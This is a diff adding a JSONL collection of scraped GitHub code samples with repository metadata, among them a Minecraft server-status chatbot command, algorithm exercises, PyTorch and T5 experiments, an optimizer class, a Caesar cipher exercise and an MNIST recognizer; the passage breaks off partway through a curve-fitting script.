diff --git "a/4804.jsonl" "b/4804.jsonl" new file mode 100644--- /dev/null +++ "b/4804.jsonl" @@ -0,0 +1,1693 @@ +{"seq_id":"74175663615","text":"from ..command import Command\nfrom ..eventpackage import EventPackage\nimport requests\nimport json\n\n# note: this command only works when run on a machine in same subnet as dot.\n# (this command will work when run on dot.)\n\nclass MCOnlineCommand(Command):\n def __init__(self):\n super().__init__()\n self.name = \"$MCOnline\"\n self.help = \"$MCOnline | Tells who is online on the minecraft server\"\n self.author = \"presto\"\n self.last_updated = \"October 4th 2019\"\n\n def run(self, event_pack: EventPackage):\n r = requests.get(\"https://api.mcsrvstat.us/2/dot.cs.wmich.edu:6969\")\n status = json.loads(r.content.decode(\"utf-8\"))\n \n playerList = \"\"\n if status[\"players\"][\"online\"] > 0:\n playerList = \"Players Online: \"\n plural = False\n for player in status[\"players\"][\"list\"]:\n if plural:\n playerList = playerList + \", \"\n playerList = playerList + player\n plural = True\n\n else:\n playerList = \"No one is online :(\"\n \n\n return playerList\n","repo_name":"ccowmu/ccawmunity","sub_path":"chatbot/commandcenter/commands/MCOnline.py","file_name":"MCOnline.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"17117956945","text":"n, k = map(int, input().split())\nN = list(map(int, input().split()))\nK = list(map(int, input().split()))\n\nresult = []\n\ndef bs(x, arr):\n bad = -1\n good = len(arr)\n while good - bad > 1:\n m = (bad + good) // 2\n if arr[m] >= x:\n good = m\n else:\n bad = m\n\n return good\n\nfor ke in K:\n index = bs(ke, N)\n\n l = -100000000000 if index - 1 < 0 else N[index - 1]\n r = 100000000000 if index > k -1 else N[index]\n dl = abs(ke - l)\n dr = abs(ke - r)\n\n value = 0\n if dl == dr:\n value = min(l, r)\n else:\n value = r if dl > dr else l\n\n result.append(str(value))\n\nprint('\\n'.join(result))\n","repo_name":"tarasneroznak/algoritmika","sub_path":"hw2/yandex/approximateBinarySearch.py","file_name":"approximateBinarySearch.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"494259976","text":"import sys\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib.cm import Paired\r\nfrom torch.utils.data import DataLoader\r\nfrom AccessCorrectFolders import abbreviate_embed_names\r\nfrom Initiate_PSiteDataset import PSiteDataset, re_init_dataset, balance_dataset\r\nfrom PSite_Models import PSitePredictV4\r\nfrom Model_analysis_functions import test_model, average_output_tuples, calculate_performance_metrics\r\n\r\n'''\r\nCompares the performance of saved PSitePredict prediction models trained on differently-derived embeddings\r\n(OneHot, ESM, CARP, AlphaFold) by testing on the same dataset and graphing the ROC and PRC Areas Under the Curve.\r\n\r\nRun this script from the command line by giving the additional argument 'ST' or 'Y' to select which P-sites to test.\r\n'''\r\n\r\nprint(\"Loading in Necessary data...\")\r\ndata_dir = \"/data/home/arendvc/\"\r\n\r\n# Choose the embeddings for which the models will be tested and select the correct source directories of the test data:\r\nembeddings = ['onehot', 'esm', 'carp', 'alphafold-t', 'alphafold-nt']\r\nembeddings = embeddings + list(map(lambda x: x + '+DSSP', embeddings))\r\n\r\ntitle_embs = list(map(abbreviate_embed_names, 
embeddings))\r\ntitle_order = [0, 5, 1, 6, 2, 7, 3, 8, 4, 9]\r\ntitle_embs = [title_embs[i] for i in title_order]\r\n\r\nembed_dirs = [data_dir + embed.replace('-nt', '').replace('-t', '') + '_outputs/' for embed in embeddings]\r\nembed_dirs = [embed_dirs[i] for i in title_order]\r\n\r\ntest_dirs = ['None'] * len(embed_dirs)\r\nfor n, edir in enumerate(embed_dirs):\r\n if n in [6, 7]:\r\n test_dirs[n] = edir + 'test_Templated/'\r\n elif n in [8, 9]:\r\n test_dirs[n] = edir + 'test_NoTemp/'\r\n else:\r\n test_dirs[n] = edir + 'Ram22_test_windowed/'\r\n\r\npsite = sys.argv[1]\r\ntest_file = \"/home/arendvc/PSite_Files/Ram22_pep_filtered_\" + psite + \"_test.fasta\"\r\n\r\n\r\nprint(\"Creating Test Datasets...\")\r\ntest_dls = []\r\nfor m, tdir in enumerate(test_dirs):\r\n ds = PSiteDataset(data_rep_dir=tdir, labels_fasta=test_file, field_radius=30)\r\n ds = re_init_dataset(ds)\r\n # bal_ds = balance_dataset(ds)\r\n\r\n channel_nr = len(ds[0][0])\r\n\r\n replicates = []\r\n for bs in range(64, 193, 32):\r\n dl = DataLoader(dataset=ds, batch_size=bs, shuffle=True)\r\n replicates.append(dl)\r\n\r\n test_dls.append((replicates, channel_nr))\r\n\r\n# Load in the saved models and run each model on the respective test data\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n# Fill in the appropriate models\r\nprint(\"Loading in Saved Models...\")\r\nmodel_paths = []\r\nfor embed_type, embed_dir in zip(title_embs, embed_dirs):\r\n model_paths.append(embed_dir + f'ModelV4_{psite}_CH40_rad30_{embed_type}_Cl2.pth')\r\n\r\n\r\noutputs = []\r\nfor n, (test_dl, num_features) in enumerate(test_dls):\r\n model = PSitePredictV4(input_shape=num_features,\r\n hidden_units=40,\r\n output_shape=2,\r\n field_length=61,\r\n kernel=3,\r\n pad_idx=1,\r\n dropout=0.3)\r\n\r\n loaded_state_dict = torch.load(model_paths[n])\r\n model.load_state_dict(loaded_state_dict)\r\n model = model.to(device)\r\n\r\n print(f\"Testing model {n + 1}...\")\r\n\r\n model_reps = []\r\n for rep in test_dl:\r\n preds = test_model(model, rep, device)\r\n model_reps.append(calculate_performance_metrics(*preds))\r\n model_avg = average_output_tuples(model_reps)\r\n\r\n outputs.append(model_avg)\r\n\r\n\r\n# Changes to make the graph nicer\r\ntitle_label = 'Ser/Thr' if psite == 'ST' else 'Tyr'\r\ncols = list(Paired.colors)\r\n\r\n# Plot the outcomes of the different models in a comparative graph\r\nplt.figure(figsize=(18, 8))\r\n\r\n# Plot ROC curve\r\nprint(\"Generating Plots...\")\r\nplt.subplot(1, 2, 1)\r\nfor m, output in enumerate(outputs):\r\n plt.plot(output[3], output[4], label=f'{title_embs[m]} ({output[0]:.3f})', color=cols[m])\r\nplt.plot([0, 1], [0, 1], 'k--')\r\nplt.xlim([0.0, 1.0])\r\nplt.ylim([0.0, 1.05])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Receiver operating characteristic')\r\nplt.legend(loc=\"lower right\", title=\"Encoder (AUC)\")\r\n\r\n# Plot Precision-Recall curve\r\nplt.subplot(1, 2, 2)\r\nfor m, output in enumerate(outputs):\r\n plt.plot(output[5], output[6], label=f'{output[1]:.3f} ({output[2]:.3f})', color=cols[m])\r\n\r\n # Also prints the mean accuracy scores for each model\r\n print(title_embs[m], f\"Total mean average: {output[7]*100:.2f}\")\r\nplt.xlim([0.0, 1.0])\r\nplt.ylim([0.0, 1.05])\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\nplt.title(f'Precision-Recall curve')\r\nplt.legend(loc=\"lower left\", title=\"AUC (F1-score)\")\r\n\r\nplt.suptitle(f\"PSitePredict Performance Comparison - 
{title_label}\")\r\nplt.savefig(data_dir + f'Model4_AUC_Comparison_CH40_R30_{psite}_5runs.png')\r\n","repo_name":"ArendVCN/MT_2223","sub_path":"scripts/Model_Comparison.py","file_name":"Model_Comparison.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14450224934","text":"from flask import Flask, render_template, request, url_for, jsonify\nimport torch\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nfrom flask_cors import CORS\n\nDEBUG = True\napp = Flask(__name__)\n# https://stackoverflow.com/questions/37575089/disable-template-cache-jinja2\n#app.config['TEMPLATES_AUTO_RELOAD'] = True\napp.config.from_object(__name__)\n\nCORS(app, resources={r'/*': {'origins': '*'}})\n\nmodel = T5ForConditionalGeneration.from_pretrained(\"t5-base\")\ntokenizer = T5Tokenizer.from_pretrained(\"t5-base\")\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n@app.route('/result', methods=['GET'])\ndef result():\n english = request.args.get('english')\n german = request.args.get('german')\n\n #encode english input with prefix\n input_ids = tokenizer.encode(\"translate English to German: \" + english, return_tensors=\"pt\")\n #encode user's german translation\n output_ids = tokenizer.encode(german, return_tensors='pt')\n\n #generate and decode machine translation of english input\n outputs1 = model.generate(input_ids, max_length=40, num_beams=4, early_stopping=True)\n machine_translation = [tokenizer.decode(g, skip_special_tokens=True, clean_up_tokenization_spaces=False) for g in outputs1]\n\n #I don't really understand this part to be honest, but it has to do with generating predictions\n outputs = model(input_ids=input_ids, lm_labels=output_ids)\n loss, prediction_scores = outputs[:2]\n\n all_predictions = []\n next_pos = 0\n colors = []\n decoded_tokens = []\n\n #loop through encoded lists of predictions\n for tok in prediction_scores[0]:\n\n #list of top 10 predictions for each token\n predicted_tokens = tok.topk(10).indices\n\n #current input token\n next_token = output_ids[0, next_pos]\n\n #decode current token and add to list\n decoded_token = tokenizer.convert_ids_to_tokens(next_token.item()).replace('\\u2581', '\\u00a0')\n decoded_tokens.append(decoded_token)\n\n encoded_predictions = []\n decoded_predictions = []\n\n #loop through each prediction for the current token\n for index in predicted_tokens:\n #convert ids to tokens to maintain word breaks; convert word break character to a space\n decoded_predictions.append(tokenizer.convert_ids_to_tokens(index.item()).replace('\\u2581', '\\u00a0'))\n encoded_predictions.append(index.item())\n\n #determine highlight color for each prediction\n if next_token in predicted_tokens:\n listpos = encoded_predictions.index(next_token) \n if listpos == 0:\n colors.append(\"lime\")\n else:\n colors.append(\"yellow\")\n else:\n colors.append(\"red\")\n\n #list of lists each containing top 10 predictions\n all_predictions.append(decoded_predictions[0:10])\n next_pos += 1\n return jsonify({\n \"translation\": machine_translation[0],\n \"predictions\": all_predictions,\n \"colors\": colors,\n \"decoded_tokens\": decoded_tokens\n })\n\n@app.route('/wholesentence', methods=['GET'])\ndef wholesentence():\n english = request.args.get('english')\n german = request.args.get('german')\n\n first_token = tokenizer.encode(german, return_tensors=\"pt\")[0][0].item()\n\n input_ids = tokenizer.encode(\"translate English to German: \" 
+ english, return_tensors=\"pt\")\n english_encoded = model.encoder(input_ids = input_ids)\n\n outputs1 = model.generate(input_ids, max_length=40, num_beams=4, early_stopping=True)\n machine_translation = [tokenizer.decode(g, skip_special_tokens=True, clean_up_tokenization_spaces=False) for g in outputs1]\n\n output_ids = tokenizer.encode(german, return_tensors='pt')\n partial_decode = torch.LongTensor([0, first_token])\n\n next_token_to_add = torch.tensor(1)\n \n while next_token_to_add.item() != 5:\n next_word_logits = model.forward(\n encoder_outputs=english_encoded, \n decoder_input_ids=partial_decode.unsqueeze(0)\n )[0]\n \n next_token_to_add = next_word_logits[0, -1].topk(5).indices[0]\n partial_decode = torch.cat((partial_decode, next_token_to_add.unsqueeze(0)), 0)\n\n final = tokenizer.decode(partial_decode)\n\n return jsonify({\"translation\": final,\n \"expected\" : machine_translation[0]\n })\n\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"adomaatobrah/simplewebpage","sub_path":"April/translation/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13476635854","text":"\"\"\"\nEncryption component\nv1 - set up encryption\n\"\"\"\n\n# set up variables\nuser_message = \"I have three Cats, two dogs, and a rabbit.\"\nshift = 9\n\n\n# result placeholder\nresult = \"\"\n\n# go through each letter of the message\nfor letter in user_message:\n # convert letters into the ASCII code\n Ascii_code = ord(letter)\n # Add shift to the ASCII code\n new_Ascii_code = Ascii_code + shift\n # revert the integer back into a string to get encrypted message\n new_letter = chr(new_Ascii_code)\n # append message into the empty string\n result = result + new_letter\n\nprint(result)\n","repo_name":"chizzywizzy833/CKCaesarCipher","sub_path":"03_encrypt_v1.py","file_name":"03_encrypt_v1.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40881051202","text":"\"\"\"Water Evaporation Optimization.\n\"\"\"\n\nimport copy\nfrom typing import Any, Dict, Optional\n\nimport numpy as np\n\nimport opytimizer.math.random as r\nimport opytimizer.utils.constant as c\nimport opytimizer.utils.exception as e\nfrom opytimizer.core import Optimizer\nfrom opytimizer.core.function import Function\nfrom opytimizer.core.space import Space\nfrom opytimizer.utils import logging\n\nlogger = logging.get_logger(__name__)\n\n\nclass WEO(Optimizer):\n \"\"\"A WEO class, inherited from Optimizer.\n\n This is the designed class to define WEO-related\n variables and methods.\n\n References:\n A. Kaveh and T. 
Bakhshpoori.\n Water Evaporation Optimization: A novel physically inspired optimization algorithm.\n Computers & Structures (2016).\n\n \"\"\"\n\n def __init__(self, params: Optional[Dict[str, Any]] = None) -> None:\n \"\"\"Initialization method.\n\n Args:\n params: Contains key-value parameters to the meta-heuristics.\n\n \"\"\"\n\n logger.info(\"Overriding class: Optimizer -> WEO.\")\n\n super(WEO, self).__init__()\n\n self.E_min = -3.5\n self.E_max = -0.5\n\n self.theta_min = -np.pi / 3.6\n self.theta_max = -np.pi / 9\n\n self.build(params)\n\n logger.info(\"Class overrided.\")\n\n @property\n def E_min(self) -> float:\n \"\"\"Minimum substrate energy.\"\"\"\n\n return self._E_min\n\n @E_min.setter\n def E_min(self, E_min: float) -> None:\n if not isinstance(E_min, (float, int)):\n raise e.TypeError(\"`E_min` should be a float or integer\")\n\n self._E_min = E_min\n\n @property\n def E_max(self) -> float:\n \"\"\"Maximum substrate energy.\"\"\"\n\n return self._E_max\n\n @E_max.setter\n def E_max(self, E_max: float) -> None:\n if not isinstance(E_max, (float, int)):\n raise e.TypeError(\"`E_max` should be a float or integer\")\n if E_max < self.E_min:\n raise e.ValueError(\"`E_max` should be >= `E_min`\")\n\n self._E_max = E_max\n\n @property\n def theta_min(self) -> float:\n \"\"\"Minimum contact angle.\"\"\"\n\n return self._theta_min\n\n @theta_min.setter\n def theta_min(self, theta_min: float) -> None:\n if not isinstance(theta_min, (float, int)):\n raise e.TypeError(\"`theta_min` should be a float or integer\")\n\n self._theta_min = theta_min\n\n @property\n def theta_max(self) -> float:\n \"\"\"Maximum contact angle.\"\"\"\n\n return self._theta_max\n\n @theta_max.setter\n def theta_max(self, theta_max: float) -> None:\n if not isinstance(theta_max, (float, int)):\n raise e.TypeError(\"`theta_max` should be a float or integer\")\n if theta_max < self.theta_min:\n raise e.ValueError(\"`theta_max` should be >= `theta_min`\")\n\n self._theta_max = theta_max\n\n def _evaporation_flux(self, theta: float) -> float:\n \"\"\"Calculates the evaporation flux (eq. 7).\n\n Args:\n theta: Radian-based angle.\n\n Returns:\n (float): Evaporation flux.\n\n \"\"\"\n\n # Calculates the evaporation flux (eq. 7)\n J = (\n (1 / 2.6)\n * ((2 / 3 + np.cos(theta) ** 3 / 3 - np.cos(theta)) ** (-2 / 3))\n * (1 - np.cos(theta))\n )\n\n return J\n\n def update(\n self, space: Space, function: Function, iteration: int, n_iterations: int\n ) -> None:\n \"\"\"Wraps Water Evaporation Optimization over all agents and variables.\n\n Args:\n space: Space containing agents and update-related information.\n function: A Function object that will be used as the objective function.\n iteration: Current iteration.\n n_iterations: Maximum number of iterations.\n\n \"\"\"\n\n space.agents.sort(key=lambda x: x.fit)\n best, worst = space.agents[0], space.agents[-1]\n\n for agent in space.agents:\n a = copy.deepcopy(agent)\n\n if int(iteration <= n_iterations / 2):\n # Calculates the substrate energy (eq. 5)\n E_sub = ((self.E_max - self.E_min) * (a.fit - best.fit)) / (\n worst.fit - best.fit + c.EPSILON\n ) + self.E_min\n\n # Calculates the Monolayer Evaporation Probability matrix (eq. 6)\n r1 = r.generate_uniform_random_number(\n size=(agent.n_variables, agent.n_dimensions)\n )\n MEP = np.where(r1 < np.exp(E_sub), 1, 0)\n\n # Generates the step size (eq. 
10)\n r2 = r.generate_uniform_random_number()\n i = r.generate_integer_random_number(0, space.n_agents)\n j = r.generate_integer_random_number(0, space.n_agents, i)\n S = r2 * (space.agents[i].position - space.agents[j].position)\n\n # Updates the agent's position (eq. 11)\n a.position += S * MEP\n else:\n # Calculates the contact angle (eq. 8)\n theta = ((self.theta_max - self.theta_min) * (a.fit - best.fit)) / (\n worst.fit - best.fit + c.EPSILON\n ) + self.theta_min\n\n # Calculates the Droplet Evaporation Probability matrix (eq. 9)\n r1 = r.generate_uniform_random_number(\n size=(a.n_variables, a.n_dimensions)\n )\n DEP = np.where(r1 < self._evaporation_flux(theta), 1, 0)\n\n # Generates the step size (eq. 10)\n r2 = r.generate_uniform_random_number()\n i = r.generate_integer_random_number(0, space.n_agents)\n j = r.generate_integer_random_number(0, space.n_agents, i)\n S = r2 * (space.agents[i].position - space.agents[j].position)\n\n # Updates the agent's position (eq. 11)\n a.position += S * DEP\n a.clip_by_bound()\n\n a.fit = function(a.position)\n if a.fit < agent.fit:\n agent.position = copy.deepcopy(a.position)\n agent.fit = copy.deepcopy(a.fit)\n","repo_name":"gugarosa/opytimizer","sub_path":"opytimizer/optimizers/science/weo.py","file_name":"weo.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":580,"dataset":"github-code","pt":"79"} +{"seq_id":"25668458201","text":"\"\"\"\nInput: A k-sorted array - array where an element is at most k distance away from it's actual sorted place\nOutput: The actual sorted array\nLogic:\nSince the array is k-sorted, reading k positions ensures that the smallest element in the k elements is the min element\nUse a min heap to read in k elements and extract the min. Repeat until the array is exhausted.\n\"\"\"\nimport heapq\nimport itertools\nimport collections\nfrom typing import List\n# from collections import Iterator\n\n\nclass Solution:\n def sort_k_sorted_array(self, input_array: List[int], k: int) -> List[int]:\n # define the min heap\n min_heap : List[int] = []\n\n # add first k elements to the heap\n for i in itertools.islice(input_array, k):\n heapq.heappush(min_heap, i)\n\n result = []\n # now iterate through the rest of the array. For every new element added, extract min and add to the result set\n for i in input_array[k:]:\n minimum = heapq.heappushpop(min_heap, i)\n result.append(minimum)\n\n # we have k elements left in the heap. 
Extract them and append to the result\n while min_heap:\n result.append(heapq.heappop(min_heap))\n\n return result\n\n\ns = Solution()\nprint(s.sort_k_sorted_array([3, -1, 2, 6, 45, 8], 2))\nprint(s.sort_k_sorted_array([3], 2))\nprint(s.sort_k_sorted_array([3, -1], 2))\n","repo_name":"adykumar/DangerWager","sub_path":"Indy/019-10.3-EPI-SortKSortedArray.py","file_name":"019-10.3-EPI-SortKSortedArray.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"33744806763","text":"import torch\nfrom torch.autograd import Variable\n\ndef scalar_grad():\n x = Variable(torch.ones(1)*3, requires_grad=True) # 3\n y = Variable(torch.ones(1)*4, requires_grad=True) # 4\n z = x.pow(2) + 3*y.pow(2)\n\n z.backward()\n\n # dz/dx = 2x\n # dz/dy = 6y\n\n print(x.grad)\n print(y.grad)\n\ndef vector_grad():\n x = Variable(torch.ones(2)*3, requires_grad=True)\n y = Variable(torch.ones(2)*4, requires_grad=True)\n z = x.pow(2) + 3*y.pow(2)\n z.backward(torch.ones(2))\n print(x.grad)\n print(y.grad)\n\ndef grad():\n W = Variable(torch.FloatTensor([[1, 1, 1], [2, 2, 2]]), requires_grad=True)\n x = Variable(torch.FloatTensor([1, 2, 3]), requires_grad=False)\n B = Variable(torch.FloatTensor([2, 2]), requires_grad=True)\n\n u = Variable(torch.FloatTensor([0, 0, 0]), requires_grad=False)\n\n y = W.mv(x-u) + B.pow(2)\n z = W.mv(x - u) + B.pow(2)\n\n # y.backward(torch.ones(1)) #\n #\n # print(W.grad)\n # print(B.grad)\n #\n # W.grad.data.zero_()\n # B.grad.data.zero_()\n #\n # z.backward(torch.ones(1))\n #\n # print(W.grad)\n # print(B.grad)\n\n r = y + z\n r.backward(torch.ones(1))\n print(W.grad)\n print(B.grad)\n\ndef grad2():\n W = Variable(torch.rand(2, 2), requires_grad=True)\n W2 = Variable(torch.rand(2, 1), requires_grad=True)\n x1 = Variable(torch.rand(1, 2), requires_grad=True)\n x2 = Variable(torch.rand(1, 2), requires_grad=True)\n\n print(\"w: \")\n print(W)\n print(\"x1: \")\n print(x1)\n print(\"x2: \")\n print(x2)\n print(\"--------------------\")\n\n y1 = torch.matmul(torch.matmul(x1, W), W2)\n print(torch.matmul(W, W2))\n # y = Variable(y, requires_grad=True)\n # print(\"y1:\")\n # print(y1)\n\n y1.backward()\n # print(W.grad)\n print(x1.grad)\n\n # W.grad.data.zero_()\n # x1.grad.data.zero_()\n y2 = torch.matmul(torch.matmul(x2, W), W2)\n y2.backward()\n # print(\"y2: \")\n # print(y2)\n # print(W.grad)\n print(x2.grad)\n\ndef test_dimension():\n batch_size = 3\n dim = 2\n x = torch.rand(batch_size, dim)\n u = torch.zeros(dim)\n W = torch.rand(dim, dim)\n\n x = Variable(x, requires_grad=True)\n u = Variable(u, requires_grad=True)\n W = Variable(W, requires_grad=True)\n print(x)\n print(u)\n print(W)\n\n temp = x - u\n y = torch.matmul(torch.matmul(temp, W), torch.sum(temp.t(), dim=1, keepdim=True))\n y.backward(torch.ones(batch_size, dim))\n print('--------')\n # print(y)\n print(x.grad)\n print(torch.matmul(x, W))\n\nif __name__ == '__main__':\n test_dimension()","repo_name":"gonglixue/PRML_Python","sub_path":"PytorchTutorials_ubuntu/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18435774498","text":"#!/usr/bin/python3\n\"\"\"Return top ten posts from subreddit\"\"\"\n\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"Return top ten posts from subreddit\"\"\"\n\n url = \"https://www.reddit.com/r/{}/hot.json\".format(subreddit)\n headers = {\"User-Agent\": 
\"Mozilla/5.0\"}\n params = {\"limit\": 10}\n response = requests.get(url, headers=headers, params=params)\n if response.status_code != 200:\n print(\"None\")\n return\n data = response.json()\n for post in data[\"data\"][\"children\"]:\n print(post[\"data\"][\"title\"])\n","repo_name":"blacky-yg/alx-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"17389991362","text":"num = []\nwhile True:\n n = int(input('Digite um valor: '))\n if n not in num:\n num.append(n)\n print('Valor adicionado com sucesso!')\n else:\n print('Esse valor já existe. Tente um outro diferente!')\n r = ' '\n while r not in 'SN':\n r = str(input('Quer continuar? [S/N]: ')).strip().upper()[0]\n if r == 'N':\n break\nprint('-='*30)\nnum.sort()\nprint(f'Você digitou os valores {num}')\n","repo_name":"fabiomacdo/curso-python","sub_path":"mundo3/ex079.py","file_name":"ex079.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4655396930","text":"import keras\r\nimport sys\r\nimport cv2\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\n# импорт MNIST dataset\r\nfrom keras.datasets import mnist\r\nfrom PIL import ImageTk, Image\r\nfrom tkinter import *\r\nfrom tkinter.filedialog import *\r\nfrom tkinter import scrolledtext\r\n\r\n\r\n\r\n\r\n#Загрузка готовых весов\r\nmodel.load_weights('mnist_weights_epoch10.h5')\r\ndef clicked():\r\n op = askopenfilename() \r\n # Проверка изображения\r\n if (len(sys.argv) == 1):\r\n img = cv2.imread(op)\r\n if (not img.data):\r\n print(\"Could not load image\")\r\n exit\r\n\r\n # предварительная обработка\r\n # Меняем цветовое пространство на RGB\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n # меняем размер\r\n img = cv2.resize(img, (28, 28), interpolation = cv2.INTER_AREA)\r\n # конвертирование в числа\r\n img = cv2.bitwise_not(img)\r\n img = img.reshape(1,28,28,1)\r\n img = img.astype('float32')\r\n img /= 255 \r\n\r\n # Предсказание рукописной цифры во входном изображении\r\n score = model.predict(img, batch_size=1, verbose=0)\r\n\r\n \r\n # Показ результатов \r\n \r\n txt.insert(INSERT, \"\\nШансы для всех возможных результатов: \")\r\n sort = sorted(range(len(score[0])), key=lambda k:score[0][k],reverse=True)\r\n for index in sort:\r\n txt.insert(INSERT, \"\\n\" + str(index) + \" : \" + str(score[0][index]))\r\n percent = format(score[0][sort[0]] * 100, '.2f')\r\n txt.insert(INSERT, \"\\nЯ думаю, что на \" + str(percent) + \"% это \" + str(sort[0]))\r\n \r\n \r\nwindow = Tk()\r\nwindow.geometry('470x600')\r\nwindow.title(\"Распознавание рукописных цифр \")\r\ntxt = scrolledtext.ScrolledText(window, width=40, height=35) \r\ntxt.grid(column=0, row=0) \r\nbtn = Button(window, text=\"Открыть\", command=clicked,background=\"#555\",foreground=\"#ccc\",padx=\"20\",pady=\"8\",font=\"16\") \r\nbtn.grid(column=1, row=0)\r\nwindow.mainloop() \r\n","repo_name":"Turchick/-NN","sub_path":"mnist_test.py","file_name":"mnist_test.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18951759704","text":"import numpy as np\r\nfrom numpy import array\r\nimport scipy.odr as odr\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport sympy as 
sp\r\nfrom scipy import stats\r\n\r\ndef line(t,b0,b1,b2,b3):\r\n x = b0 + b2*t\r\n y = b1 + b3*t\r\n return x,y\r\ndef line_ini(x,y):\r\n d=2;K=1\r\n X_nd = np.hstack((x[:,None],y[:,None]))\r\n bparm = np.zeros(d+K*d)\r\n Xbari = np.mean(X_nd,axis=0)#1-by-d\r\n bparm[:d]=Xbari\r\n Bi = X_nd-Xbari\r\n BBi = np.dot(Bi.T,Bi)\r\n D,V = np.linalg.eig(BBi)\r\n ind = np.argsort(D)#sort from small to big\r\n for k in np.arange(K):\r\n v = V[:,ind[-k-1]]# the biggest eigenvector\r\n v = v[...,None]\r\n bparm[d+k*d:d+(k+1)*d]=v.flatten()*np.sign(v[0])\r\n return bparm\r\n\r\ndef quadratic(t,b0,b1,b2,b3):\r\n \"\"\"\r\n len_b = 4\r\n \r\n input: \r\n t: \r\n b \r\n b0,b1: origin\r\n b2: parameter for quodratic term, b[2]>0\r\n b3: rotation angle (e.g. pi/2, pi,...)\r\n \"\"\"\r\n xx = t\r\n yy = b2*t**2\r\n \r\n s = sp.sin(b3)\r\n c = sp.cos(b3)\r\n x = xx*c-yy*s+b0\r\n y = xx*s+yy*c+b1\r\n return x,y\r\n \r\ndef quadratic_ini(x,y,w=None):\r\n if w is None:\r\n sw=1\r\n else:\r\n sw = np.sqrt(w)\r\n x = x.astype('float64')\r\n y = y.astype('float64')\r\n n_rot = 32\r\n rot = np.array([2*i*np.pi/n_rot for i in range(n_rot)]) \r\n X_dn = np.vstack((x,y))\r\n n = x.shape[0]\r\n res = np.zeros((n_rot,))\r\n coef= np.zeros((n_rot,3))\r\n for i in range(n_rot):\r\n Xr_dn = rotation(X_dn,rot[i])\r\n xx = Xr_dn[0,:]\r\n yy = sw*Xr_dn[1,:]\r\n A = sw*np.array([np.ones((n,)),xx,xx**2])\r\n beta, residual,rank,s = np.linalg.lstsq(A.T,yy)\r\n coef[i,:]=beta\r\n try:\r\n tmp = residual[0]\r\n except:\r\n tmp=np.max(res)\r\n res[i] = tmp\r\n \r\n ind = np.argmin(res)\r\n c = coef[ind,:]\r\n if c[2]<1e-2:\r\n c[2]=1e-2\r\n b0r = -c[1]/2/c[2]\r\n b1r = c[0]-c[1]**2/4/c[2]\r\n \r\n b2 =c[2]\r\n b3 = -rot[ind] \r\n center=rotation(np.array([[b0r],[b1r]]),b3).flatten()\r\n b0=center[0]\r\n b1=center[1]\r\n B0 = np.array([b0,b1,b2,b3])\r\n return B0\r\n\r\ndef quadratic_stdfy(bparm):\r\n # bparm is of size(n,4)\r\n bstdfy = bparm.copy()\r\n b2 = bparm[:,2]\r\n b3 = bparm[:,3]\r\n bstdfy[:,2]=np.abs(b2)\r\n bstdfy[:,3]=np.mod(b3+np.pi*(b2<0),2*np.pi)\r\n return bstdfy\r\n\r\ndef quadratic3D(t,x0,y0,z0,a,b,c,beta):\r\n \"\"\"\r\n len_b = 7\r\n \"\"\"\r\n xx = t\r\n# yy = 0\r\n zz = beta*t**2\r\n sa = sp.sin(a)\r\n ca = sp.cos(a)\r\n sb = sp.sin(b)\r\n cb = sp.cos(b)\r\n sc = sp.sin(c)\r\n cc = sp.cos(c)\r\n x = cb*cc*xx + (sa*sc-ca*sb*cc)*zz+x0\r\n y = -cb*sc*xx + (sa*cc+ca*sb*sc)*zz+y0\r\n z = sb*xx+ca*cb*zz+z0\r\n return x,y,z\r\n\r\ndef quadratic3D_ini(x,y,z,w=None):\r\n if w is None:\r\n sw=1\r\n else:\r\n sw = np.sqrt(w)\r\n x = x.astype('float64')\r\n y = y.astype('float64')\r\n n_th = 4\r\n rot = np.array([i*np.pi/n_th for i in range(n_th)]) \r\n n_rot = n_th**3\r\n X_dn = np.vstack((x,y,z))\r\n n = x.shape[0]\r\n res = np.zeros((n_rot,))\r\n coef= np.zeros((n_rot,3))\r\n rotijk = np.zeros((n_rot,3))\r\n count=0\r\n for i in range(n_th):\r\n for j in range(n_th):\r\n for k in range(n_th):\r\n Xr_dn = rotation_3D(X_dn,rot[i],rot[j],rot[k])\r\n xx = Xr_dn[0,:]\r\n zz = 